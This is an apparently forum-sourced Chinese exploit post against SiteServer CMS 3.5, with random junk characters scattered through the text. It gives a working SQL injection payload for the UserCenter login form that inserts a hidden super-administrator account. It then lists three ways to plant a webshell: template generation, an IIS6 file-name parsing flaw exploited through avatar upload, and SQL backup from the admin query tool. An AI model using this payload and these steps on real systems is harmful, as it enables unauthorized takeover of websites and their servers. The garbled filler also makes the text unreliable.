经测试秒杀最新的3.5版; Y7 w* l* V6 T, P
, V% T+ Q' j4 `& J$ w$ Hstieserver官网:www.siteserver.cn
/ v! k. c6 w7 |. Z4 c. l$ \
/ |* m! Y' k" B+ H, b* p' e
4 t! k9 r7 K$ M- t2 A6 T1 Y
5 k7 \3 }! Z2 a8 g+ ?EXP:
# D9 y1 J# W1 b* k% |
+ f0 h7 E2 j% N& O. y: K* u直接访问UserCenter/login.aspx
2 Q* z) G; o8 k. R# q/ }. ^
6 D# g& _3 d2 A5 e4 a' n . ]9 r; J: q* A3 n G. ~( j
! _/ Q; R& a N$ Y6 {% U. ^用户名处输入:
7 O- ^4 g4 W; f) _+ q
. @. F* C X8 n8 V( ]123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--5 Y) h. J+ Y. G ^8 B7 V
# M: A [( p, P! J8 h
8 o$ ^# s. L4 P, o
/ ?5 |1 L! I c" ]$ E; r2 R4 r. z密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
: X# Q9 `% i' G0 c" u1 i6 }2 Z! D Y U7 m9 o# m! z( v& m
0 K9 @- Q4 V6 P* S' x6 [" U+ a
9 Y5 e9 t# T7 z/ X, @: i之后再访问后台SiteServer/login.aspx用插入的用户登陆+ x g; i0 K+ B6 ?5 K1 o1 M
' m2 j" v% a/ x1 v3 M3 c
% q' {' `# d0 \ ]4 ^9 q* h# u6 [( w6 c% Q8 q h
后台拿webshell的三种方法:8 d* y r/ X' g3 o2 ]
. K# g, f. h' {7 b8 e# y# g$ E9 E& R
一、/ z3 L8 ^3 R* t. y
|+ R" \+ \( V2 |9 p) n
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
+ ~. w3 F" U* D* p( f( v9 h" ]8 g1 \
- \# d' g$ l9 Q: _二、
1 k0 ^2 p' Y/ q3 J+ D1 _( |1 R& h- E. P, _& U) ]6 m: c# s
成员权限-》添加用户-》用户名为:1.asp1 T% Q; B0 N6 V# |
& u. g5 a, ]0 a$ }
http://127.0.0.1/usercenter/
- J2 s: r; {$ J: |: ~# L' x( C$ V# W- N- x: z1 _, Y5 A. n
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
" q- J; `' T. r' b% G- |# E
! X4 v$ u2 h4 L9 j(ps:后台添加用户时不会验证是否含有非法字符)8 W- q7 ^+ c' f# W/ L
( V! v' \% X& M ?9 j Q
三、( O# O' I7 c# I F4 `) z0 \2 ^
' n% G$ }+ [% L( p; v0 [( ^系统工具-》实用工具-》机器参数查看0 m/ B4 ^6 {# T0 x$ F3 j
可以看到数据库类型、名称,WEB路径+ H4 n( Z8 v8 _6 y' `& U
! k0 W/ B2 J1 x0 ~
系统工具-》数据库工具-》SQL语句查询' k2 D2 r2 S5 Y3 K. }0 e) C
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
& m* J3 l7 D5 P6 O
2 H: ], Z! Q9 n: _0 w( ^6 I, i |